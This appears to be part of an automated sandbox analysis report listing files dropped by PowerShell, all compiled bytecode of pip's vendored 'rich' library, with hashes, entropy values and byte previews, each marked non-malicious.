                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...e.r0d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...e.e.g.e.f...Z.G.d.d...d...Z.e.d.k.r[d.d.l.m.Z...e...Z.e.j.d.d.d.....e.j.d.d.d.....d.S.d.S.)......)...datetime)...Iterable..List..Optional..TYPE_CHECKING..Union..Callable.....)...Text..TextType)...Console..ConsoleRenderable..RenderableType....Tablec....................@...s....e.Z.d.Z.............d.d.e.d.e.d.e.d.e.e.e.f...d.e.d.e.e...d.d.f.d.d...Z.............d.d.d.d.e.d...d.e.e...d.e.e.e.e.f.....d.e.d.e.e...d.e.e...d.e.e...d.d.f.d.d...Z.d.S.)...LogRenderTF..[%x %X].......show_time..show_level..show_path..time_format..omit_repeated_times..level_width..returnNc....................C...s....|.|._.|.|._.|.|._.|.|._.|.|._.|.|._.d.|._.d.S.).N).r....r....r....r....r....r......_last_time)...selfr....r....r....r....r....r......r.....sC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\pip/_vendor/rich/_log_render.py..__init_
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1309
                                                                                                                                                                                                            Entropy (8bit):5.198157274939847
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:9u+bY8FN9DTBmr9ukW1ZX2LsHN9DV5qZoN9DounfnYPfu9tw4AKertbONIb:9u+bYEbTBd1ZX2wHb+qbVY+S4A7rVVb
                                                                                                                                                                                                            MD5:665B99645B02A996BF05D68B1F41D602
                                                                                                                                                                                                            SHA1:559FA3B80F0E6882D18CF5F7DFD05B5DBA21EF6F
                                                                                                                                                                                                            SHA-256:CF3BA3FC6B73AF0F4CCD2CD6BD1459B661AA33FBF243DFC456D24D55FC46C874
                                                                                                                                                                                                            SHA-512:9CA89BFC1395A5028E8540610C835DA1365E26622FF832CFDFACEA41528C6630AFBE55EDD1A5B286F0D94F710AB3F71F374F447EE7BE6C1384816CBBB64AFAFD
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.d.l.m.Z.m.Z.m.Z...e.d...Z.d.e.e...d.e.e.e.e.f.....f.d.d...Z.d.e.e...d.e.e.e.e.f.....f.d.d...Z.d.e.e...d.e.e.e.e.e.f.....f.d.d...Z.d.S.)......)...Iterable..Tuple..TypeVar..T..values..returnc....................c...sN.....t.|...}.z.t.|...}.W.n...t.y.......Y.d.S.w.d.|.f.V...|.D.].}.d.|.f.V...q.d.S.).z9Iterate and generate a tuple with a flag for first value.NTF....iter..next..StopIteration).r......iter_values..value..r.....mC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\pip/_vendor/rich/_loop.py..loop_first....s..........................r....c....................c...sR.....t.|...}.z.t.|...}.W.n...t.y.......Y.d.S.w.|.D.].}.d.|.f.V...|.}.q.d.|.f.V...d.S.).z8Iterate and generate a tuple with a flag for last value.NFTr....).r....r......previous_valuer....r....r....r......loop_last....s..........................r....c....................c...s^.....t.|...}.z.t.|...}.W.n...t.y.......Y.d.S.w.d.}.|.D.].}.|.d.|.f.V
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3620
                                                                                                                                                                                                            Entropy (8bit):4.5480046608663285
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:9LSsTFUEzZUc/Qc/G3Nc/Yoc/cNc/YoEc/DdHdc/jc/YDUfc/Pc/U1c/YTInmc/W:dSsTFXlPxYXcSYGkoYDxUjYS93f/vN7o
                                                                                                                                                                                                            MD5:2D0A8EA6591ADF273E420EDD16926595
                                                                                                                                                                                                            SHA1:B25AC467C8FB68B1B884082D93A25F73F6B7AE60
                                                                                                                                                                                                            SHA-256:1401641BC834693371ABCDF7DFC8EC47ED8E97C48678677156546F27750F838F
                                                                                                                                                                                                            SHA-512:A366612AA38B489DE7714A2A9F079E4EA676844FB34D3CCC75F3080854A1CCCB0DB4422E92933ED30BDD5BCF6B0791C72B4027DC56F495FB4D546E873DF70F59
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gk........................@...sJ...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...G.d.d...d.e.e.....Z.e...Z.d.S.)......)...TracebackType)...IO..Iterable..Iterator..List..Optional..Typec....................@...s....e.Z.d.Z.e.d.e.f.d.d.....Z.e.d.e.f.d.d.....Z.d.e.f.d.d...Z.d;d.d...Z.d.e.f.d.d...Z.d<d.e.d.e.f.d.d...Z.d.e.f.d.d...Z.d<d.e.d.e.f.d.d...Z.d<d.e.d.e.e...f.d.d...Z.d<d.e.d.e.d.e.f.d.d...Z.d.e.f.d.d...Z.d.e.f.d.d ..Z.d<d!e.e...d.e.f.d"d#..Z.d.e.f.d$d%..Z.d&e.e...d.d.f.d'd(..Z.d.e.f.d)d*..Z.d.e.e...f.d+d,..Z.d.e.e...f.d-d...Z.d/e.e.e.....d0e.e...d1e.e ..d.d.f.d2d3..Z!d4e.d.e.f.d5d6..Z"d;d7d8..Z#d.e.f.d9d:..Z$d.S.)=..NullFile..returnc....................C........d.S...N........selfr....r.....rC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\pip/_vendor/rich/_null_file.py..mode...........z.NullFile.modec....................C...r....).Nr....r....r....r....r....r......name....r....z.NullFile.namec....................C...r......NFr....r....r...
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5114
                                                                                                                                                                                                            Entropy (8bit):3.0473254277951525
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:95yYXXQiL//gYllbV74xGHEyF8jiZX6DctuQXu5oD9Y/eagEYeCN:T/s/YB
                                                                                                                                                                                                            MD5:0FFE5ACD12AB4E2633D34765A484EC69
                                                                                                                                                                                                            SHA1:4DC3D97B38CB2CF64972B0B7D1D7CAC2B60B459C
                                                                                                                                                                                                            SHA-256:2072E5E886B3FD06E7A7EA1E53282EBDDA46A23E1B145C31FB4FC20DDDCDBAAB
                                                                                                                                                                                                            SHA-512:7BDCDCE0F66025EDC2900FF32712B4224BEFD5B58A7E4D96EC5829692C70A9DBBCFF0113B3417017455C409161D5F764BCAAF51A09B11040A8AA046E9CDB2BF0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s4...d.d.l.m.Z...e.g.d.....Z.e.g.d.....Z.e.g.d.....Z.d.S.)......)...Palette).)......r....r....)................)...............)...............).r.....7........)..............)..:............)......r....r.......v...r....r....).......H....V...)...........r....)...............)..;....x........).....r........)..a........r&...)......r'...r'...)...r....r....r....).....r....r....).r....r)...r....).r)....U...r....).r....r....r)...).r)...r....r)...).r....r)...r)...).r)...r)...r)...).r*...r*...r*...).r"...r*...r*...).r*...r"...r*...).r"...r"...r*...).r*...r*...r"...).r"...r*...r"...).r*...r"...r".....r"...r"...r"...(....r(...).....r....r....).r....r,...r....).r,...r,...r....).r....r....r,...).r,...r....r,...).r....r,...r,...)......r-...r-.....r,...r,...r,.....r"...r....r......r....r"...r......r"...r"...r......r....r....r".....r"...r....r".....r....r"...r"...r+...r(...).r....r....._...).r....r........).r....r........).r....r.........r2...).r..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):657
                                                                                                                                                                                                            Entropy (8bit):5.208281226114199
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:CQ8+K7Q7hXoUc7JDH20St+/FHYfCSFjx1XW1IqZ//2IsajkebZ+hg:989U85WjIt4bjfWeqZX2Lhekg
                                                                                                                                                                                                            MD5:D53815021BFD101D6E808E06799DCF48
                                                                                                                                                                                                            SHA1:6E80DBFF2BACB20689D79038B7A96A4FD45E3C24
                                                                                                                                                                                                            SHA-256:D915A2C752104FA2C6394E6B2289A0DA896E8C63725DB39A24913CB1CB572E6B
                                                                                                                                                                                                            SHA-512:C8B0799BECD2A08CEC7DF5503F39C9BC948F6C1274733FAFC05EE3CD202934C546D2105D8BEF905E694D6A82D5EC7708850F0B157B36A4137F8B9E93A42AFFC8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s&...d.d.l.m.Z...d.e.e...d.e.f.d.d...Z.d.S.)......)...Optional..values..returnc....................G...s....|.s.J.d.....|.D.].}.|.d.u.r.|.....S.q.t.|...S.).z.Pick the first non-none bool or return the last value... Args:. *values (bool): Any number of boolean or None values... Returns:. bool: First non-none boolean.. z.1 or more values requiredN)...bool).r......value..r.....mC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\pip/_vendor/rich/_pick.py..pick_bool....s................r....N)...typingr....r....r....r....r....r....r......<module>....s........
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5174
                                                                                                                                                                                                            Entropy (8bit):5.323427675628491
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:9hvX0zyy5ajgZdIDpkep6Pd21FBoZkLIDHBNHaPYRYAvHatVpZVbO9:n04UZdcpV3QkLq1QQiVA
                                                                                                                                                                                                            MD5:B118D3467649F8F4AACC91C3C3F2C7F8
                                                                                                                                                                                                            SHA1:73B8715D5E058650B24162CD0736E7D3230E7982
                                                                                                                                                                                                            SHA-256:D98FA0EC52587AA0B7C344CA572CFE877DB5D9B6A93A3D51D438F8ABC3D06619
                                                                                                                                                                                                            SHA-512:9E74F36FC91ED7B80502E80BBD8AEAD43F0D6608A96ED79FAB17DB95155415825AAC22343346159A477564CF01CF846BD56CA3667BD7E5CC678A33455A56E20C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g`........................@...sH...d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...e.j.d.k.r(d.d.l.m.Z...n.d.d.l.m.Z...G.d.d...d.e...Z.d.e.d.e.e...d.e.e...f.d.d...Z.d.e.d.e.e...d.e.e...d.e.e...d.e.e...f.d.d...Z...d.d.e.d.e.e...d.e.e.e.....d.e.e...f.d.d...Z.e.d.k.r.d.d.l.m.Z...e.G.d.d...d.....Z.e.d.e.d.d.d...e.d.d.d...e.d.d.d...g...Z.e.e.e.......d.S.d.S.)......N)...Fraction)...ceil)...cast..List..Optional..Sequence)...........)...Protocolc....................@...s:...e.Z.d.Z.U.d.Z.d.Z.e.e...e.d.<.d.Z.e.e.d.<.d.Z.e.e.d.<.d.S.)...Edgez1Any object that defines an edge (such as Layout).N..size.......ratio..minimum_size)...__name__..__module__..__qualname__..__doc__r....r......int..__annotations__r....r......r....r.....nC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\pip/_vendor/rich/_ratio.pyr........s..............r......total..edges..returnc....................C...s....d.d...|.D...}.t.}.d.|.v.rtd.d...t.t.|.|.....D...}.|.t.d.d...|.D...
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):12288
                                                                                                                                                                                                            Entropy (8bit):5.561309200543539
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:NOMXuQHdqVJqSyPdtF7nuSn3nXn1YACheMOY+3DjWTJOHQ6496TsH:Ir4qrqSMKEypj+3DjWTgHQ6Bw
                                                                                                                                                                                                            MD5:4B0FB8C51B93814E2336BB166AB12D55
                                                                                                                                                                                                            SHA1:9ACA73E944F80C4B12AAEF0169230728A9792970
                                                                                                                                                                                                            SHA-256:20DF453C96CA897F7519A17E34A0BE9D35C04B0FC3873C8C163054785438DB57
                                                                                                                                                                                                            SHA-512:A28A18EDF58FB494D7F11444408FE1BDAEA0D86CA6B71E435AEB8AB894147FE25F7C612CB09428CD380994E15F207866967072FFA0FFF9B74A42AC676E7D677A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.M.......................@...s....d.Z.i.d.d.d.d.....d.d.d.d.....d.d.d.d.....d.d.d.d.....d.d.d.d.....d.d.d.d.....d.d.d.d.....d.d.d.d.....d.d.d.d.....d.d.d.d.....d.d.d.d.....d.d.g.d...d.....d.d.d.d.....d.d.g.d ..d.....d!d.d"d.....d#d.d$d.....d%d&g.d'..d.....i.d(d)g.d*..d.....d+d,d-d.....d.d.d/d.....d0d,d1d.....d2d.d3d.....d4d5d6d.....d7d5d8d.....d9d:d;d.....d<d5d=d.....d>d.d?d.....d@d5dAd.....dBd5dCd.....dDd.dEd.....dFdGdHd.....dId.dJd.....dKd5dLd.....dMdNdOd.......i.dPd5dQd.....dRdGdSd.....dTd.dUd.....dVdWdXd.....dYd.dZd.....d[d5d\d.....d]d.d^d.....d_d.d`d.....dadbdcd.....ddd.ded.....dfd.dgd.....dhd.did.....djd.dkd.....dldGdmd.....dnd5dod.....dpd.dqd.....drd.dsd.......i.dtd.g.du..d.....dvd5g.dw..d.....dxd.g.dy..d.....dzd.g.d{..d.....d|d)d}d~g.d.....d.dbg.d...d.....d.d.g.d...d.....d.d.g.d...d.....d.dNg.d...d.....d.d.g.d...d.....d.d.g.d...d.....d.d:d.d.g.d.....d.d.g.d...d.....d.d5g.d...d.....d.d.d.d.....d.d.g.d...d.....d.d&d.d.......d.g.d...d...d.g.d...d...d.d.d...d.g.d...d...
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):855
                                                                                                                                                                                                            Entropy (8bit):4.999215480023914
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:CQ0+ruNYP833QeTppSaLyywuc/2IsajlTmGG0VsOqfCR28xlKz2eOW:90+8wyN2y02LUCGG0VrRtzKbOW
                                                                                                                                                                                                            MD5:C57B19799E44B3248A376CA4E1A1D3C6
                                                                                                                                                                                                            SHA1:C03181687C5E1199498E7C28BE638403AA5CF80D
                                                                                                                                                                                                            SHA-256:A31699F47E4B9FBCF9DBF906D3BD89F709F49426C749CD6F09984A6ECA164807
                                                                                                                                                                                                            SHA-512:73383301C3841CFDE92E99A3284FE4E512F8F6D10F2264152CBF8C289D1DB4087605C948C8F61AB378745CF9C57A1BA7EEA174FD8A580AD6C1D8E34B53E9B1EB
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g_........................@...s0...d.d.l.m.Z.m.Z...e.d...Z.G.d.d...d.e.e.....Z.d.S.)......)...List..TypeVar..Tc....................@...s4...e.Z.d.Z.d.Z.e.d.e.f.d.d.....Z.d.e.d.d.f.d.d...Z.d.S.)...Stackz.A small shim over builtin list...returnc....................C...s....|.d...S.).z.Get top of stack........)...selfr....r.....nC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\pip/_vendor/rich/_stack.py..top....s......z.Stack.top..itemNc....................C...s....|...|.....d.S.).z<Push an item on to the stack (append in stack nomenclature).N)...append).r....r....r....r....r......push....s......z.Stack.push)...__name__..__module__..__qualname__..__doc__..propertyr....r....r....r....r....r....r....r........s..............r....N)...typingr....r....r....r....r....r....r....r......<module>....s..........
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):704
                                                                                                                                                                                                            Entropy (8bit):5.281041987320994
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:CQD6Bfh/tnvXc57IpiwT/KE6BVCuL7eOWS9Gd0/2Isaa8/qDM02lS6Ng:9YtnvX0IxW7BU67JO02LYyMplSd
                                                                                                                                                                                                            MD5:ED39F17EC5C534EA994F626095206116
                                                                                                                                                                                                            SHA1:99D213550F060B81FF621DEC944B305BF0388CC1
                                                                                                                                                                                                            SHA-256:0CF043D8324D89588632CD9CF95E9174941DAE5A684B0E887F70FF371DE04B21
                                                                                                                                                                                                            SHA-512:16774B399FF53652859F21577FD51FAE09B883CC3307952C17A80EDE0A592B937B560E6339442FE5934FF28512849E01DEF34CFD75C5319F1A08B3B4F2A25CC5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...sF...d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z...e.j.d.d.e.d.e.d...f.d.d.....Z.d.S.).z-.Timer context manager, only used in debug........)...timeN)...Generatorr......subject..return).NNNc....................c...s:.....t...}.d.V...t...|...}.|.d...}.t.|...d.|.d...d.......d.S.).z0print the elapsed time. (only used in debugging)Ni....z. elapsed z..1f..ms).r......print).r......start..elapsedZ.elapsed_ms..r.....nC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\pip/_vendor/rich/_timer.py..timer....s................r....)...__doc__r......contextlib..typingr......contextmanager..strr....r....r....r....r......<module>....s................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):19024
                                                                                                                                                                                                            Entropy (8bit):5.489070489162807
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:JkDK5TSj+ZLaC/VUWZ6X/UWP3tVCmtwsXimfeXBQXw:uHczN5wP33tJffeXBQXw
                                                                                                                                                                                                            MD5:DBA4111EAF4981074B106D930E85FB29
                                                                                                                                                                                                            SHA1:4FA4BACEB441E469CCDBB28C8D157765C6208A91
                                                                                                                                                                                                            SHA-256:2788376F6CD646CA4D25CB1A41F007A84DDA4DD387DB408037AF18EDC7C1B98D
                                                                                                                                                                                                            SHA-512:4C4C966DBB92B7C03625D613FBCEA25CBC6492EDD50EBBA6966E01EB9F762AA8A248D2960116DFF8E060F9618F9A88F066870E5E390862C48414962F5D1A4BF7
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g$Y.......................@...s&...U.d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.Z.e.e.d.<.e.j.d.k.r#e...e.j...Z.n.e.e...d.......d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.Z.d.Z.e.j.Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e.j...Z e.j!j"Z#e.j$g.e#_%e.j&e#_'e.f.d.e(d.e.j&f.d.d...Z"e.j!j)Z*e.j&e.j+g.e*_%e.j,e*_'d.e.j&d.e(f.d.d...Z)e.j!j-Z.e.j&e.j/e.j$e.e.e...e...e..0e.j$..g.e._%e.j,e._'d.e.j&d.e1d.e(d.e.d.e(f.d.d ..Z2e.j!j3Z4e.j&e.j5e.j$e.e.e...e...e..0e.j$..g.e4_%e.j,e4_'d.e.j&d!e(d.e(d.e.d.e(f.d"d#..Z3e.j!j6Z7e.j&e.j5g.e7_%e.j,e7_'d.e.j&d!e.j5d.e8f.d$d%..Z6e.j!j9Z:e.j&e..0e...g.e:_%e.j,e:_'d.e.j&d.e.f.d&d'..Z9e.j!j;Z<e.j&e.e.e...e...g.e<_%e.j,e<_'d.e.j&d(e.d.e8f.d)d*..Z;e.j!j=Z>e.j&e..0e ..g.e>_%e.j,e>_'d.e.j&d+e d.e8f.d,d-..Z=e.j!j?Z@e.j&e..0e ..g.e@_%e.j,e@_'d.e.j&d+e d.e8f.d.d/..Z?e.j!jAZBe.jCg.eB_%e.j,eB_'d0e1d.e8f.d1d2..ZDG.d3d4..d4..ZEe.d5k...r.e"..ZFd.d6lGmHZH..eH..ZIeEe.jJ..ZKeK.Ld7....e.d8d9d:..ZMe..Nd;..ZOeI.Pd<....eI.Qd=
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1806
                                                                                                                                                                                                            Entropy (8bit):5.473340809669744
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:9vDx4HHQMhS5Th2EsOpETPnLz6GFJonP7Ujb/v:9vDx4nnmYLTPjJoPqDv
                                                                                                                                                                                                            MD5:CC436976476ED9BA270AED0CE848A3C5
                                                                                                                                                                                                            SHA1:F2CA3CBA2AC8FADA6D8F0965D14BB9240F82DBF6
                                                                                                                                                                                                            SHA-256:7375E9B10C6D51C31C8A90F42C9319B531BD2E18DFCF5BDCD5E6EBC2ECC8A4F9
                                                                                                                                                                                                            SHA-512:FA1762131574DAC5D0A07DBB27AFF87A9CED195ECECA415E85437D21E2D82F198036DACD31FF4033CA24F0A43B38AF87060C5B83ECDEB6EBF26CCAD0E9464723
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.d.l.Z.d.d.l.m.Z...e.G.d.d...d.....Z.z)d.d.l.Z.d.d.l.m.Z...e.j.d.k.r)e.e.j...Z.n.d.Z.e.d.....d.d.l.m.Z.m.Z.m.Z.m.Z...W.n...e.e.e.f.yO......d.e.f.d.d...Z.Y.n.w.d.e.f.d.d...Z.e.d.k.rzd.d.l.Z.e...Z.d.d.l.m.Z...e.d.e.......d.......e.e.e.......d.S.d.S.)......N)...dataclassc....................@...s,...e.Z.d.Z.U.d.Z.d.Z.e.e.d.<...d.Z.e.e.d.<.d.S.)...WindowsConsoleFeaturesz.Windows features available.F..vt..truecolorN)...__name__..__module__..__qualname__..__doc__r......bool..__annotations__r......r....r.....pC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\pip/_vendor/rich/_windows.pyr........s................r....)...LibraryLoader..win32z.Not windows).."ENABLE_VIRTUAL_TERMINAL_PROCESSING..GetConsoleMode..GetStdHandle..LegacyWindowsError..returnc....................C...s....t...}.|.S.).N).r....)...featuresr....r....r......get_windows_console_features#...s........r....c....................C...s....t...}.z.t.|...
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2060
                                                                                                                                                                                                            Entropy (8bit):5.8337472900143785
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:9J3G2ClS/bCr33XRQtF+UUJeDmMQ2ggm+9bGFaaV:9JmlaFPD3mGKh
                                                                                                                                                                                                            MD5:ADFCB61647C7FD6DA25D122D1A6A24EC
                                                                                                                                                                                                            SHA1:21E4FBD6D917BC59FC70846E996DC0CCD548901A
                                                                                                                                                                                                            SHA-256:729C1F325C00F8B406A7FD51FF7EA8575E825A713B7A01FFAE224516795B6804
                                                                                                                                                                                                            SHA-512:42CC68A2BFE2C428578F35B022EF1D0E291B74F0FB7EC0F5435939E7BC28155376C59444881FF8C6B373F40F2A4FE07157BB6F8DBC00A7410AAF70556FE4CBAD
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...sZ...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.e.e...d.e.d.d.f.d.d...Z.d.S.)......)...Iterable..Sequence..Tuple..cast)...LegacyWindowsTerm..WindowsCoordinates)...ControlCode..ControlType..Segment..buffer..term..returnNc....................C...s....|.D.].\.}.}.}.|.s.|.r.|...|.|.....q.|...|.....q.|.}.|.D.].}.|.d...}.|.t.j.k.rBt.t.t.t.t.f...|...\.}.}.}.|...t.|.d...|.d...d.......q.|.t.j.k.rM|...d.....q.|.t.j.k.r[|...t.d.d.......q.|.t.j.k.re|.......q.|.t.j.k.ro|.......q.|.t.j.k.ry|.......q.|.t.j.k.r.|.......q.|.t.j.k.r.t.t.t.t.f...|...\.}.}.|...|.d.......q.|.t.j.k.r.|.......q.|.t.j.k.r.|.......q.|.t.j.k.r.t.t.t.t.f...|...\.}.}.|.d.k.r.|.......q.|.d.k.r.|.......q.|.d.k.r.|.......q.|.t.j.k.r.t.t.t.t.f...|...\.}.}.|...|.....q.q.d.S.).a....Makes appropriate Windows Console API calls based on the segments in the buffer... Args:. buffer (Iterable[Segment]): Iterable of Segments to convert to Win32 API calls.. term (Lega
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1568
                                                                                                                                                                                                            Entropy (8bit):5.588919092592035
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:9ml+6I7FldCYZX2hlXTTNTND/3Eh30m3mAVd96rTep1TyOaGJ:9msrWjTxyh32qqX6ZJ
                                                                                                                                                                                                            MD5:9046FDD3F03F30D9236339E5CE6CAE91
                                                                                                                                                                                                            SHA1:371330500AA1624AF47ECDB5AFE19677A24F2DBC
                                                                                                                                                                                                            SHA-256:02852AA38787F2F6A91A2F7294738291DE2338725C02B290C9BF47C8145EBBAB
                                                                                                                                                                                                            SHA-512:13B4CB562BB9CF9C80EFC2DE432A7B1AE2EA110BE5C0FC18EFD607126324C5C25477016283AE9A0A5DCDEB90D3AD575FB46EAA90F820369388F7F33DC7B8649A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g0........................@...s....d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...e...d...Z.d.e.d.e.e.e.e.e.f.....f.d.d...Z.d.d.e.d.e.d.e.d.e.e...f.d.d...Z.e.d.k.r`d.d.l.m.Z...e.d.d...Z.e...d.....e.e.d.d.d.d.......d.S.d.S.)......N)...Iterable..List..Tuple.....)...loop_last)...cell_len..chop_cellsz.\s*\S+\s*..text..returnc....................c...sX.....d.}.t...|.|...}.|.d.u.r*|.....\.}.}.|...d...}.|.|.|.f.V...t...|.|...}.|.d.u.s.d.S.d.S.).Nr....)...re_word..match..span..group).r......position..word_match..start..end..word..r.....mC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\pip/_vendor/rich/_wrap.py..words....s......................r....T..width..foldc....................C...s....g.}.|.j.}.d.}.t.}.t.|...D.]Y\.}.}.}.|.|.......}.|.|...|.k.r`|.|.k.rS|.rHt.|.|.d.d...}.t.|...D.].\.}.}.|.r9|.|.....|.r@|.|...}.q/|.t.|...7.}.q/q.|.rN|.|.....|.|...}.q.|.r_|.r_|.|.....|.|...}.q.|.|.|...7.}.q.|.S.).Nr....)...max_sizer....)...appendr....r..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1331
                                                                                                                                                                                                            Entropy (8bit):5.159571962109327
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:9E0Bm3nuT/XpMG4kZRD6zZS1j/JBF4kD92LHDcNmR9igzZgKPqgHmc:9E0s3nQXpYkHD6zZS1FBF4kh2z+os6V5
                                                                                                                                                                                                            MD5:764AF6666E089408CDD45C5F3843881F
                                                                                                                                                                                                            SHA1:883FBD4BF1D63DF6AB1C430C78E2EE065E66B7E5
                                                                                                                                                                                                            SHA-256:15D54ABAA8457F4B75D75C040A6B756F03D43AC06155B8CDDB0B70D20F00D131
                                                                                                                                                                                                            SHA-512:8944D542B1610BEC4018CC465EF19F350A134E25501AA9AFCDB2E58B03FD5652CD268B12588951D872E0366092743E6C3F7B4A89FBD5284FC34677DABEAD35B9
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
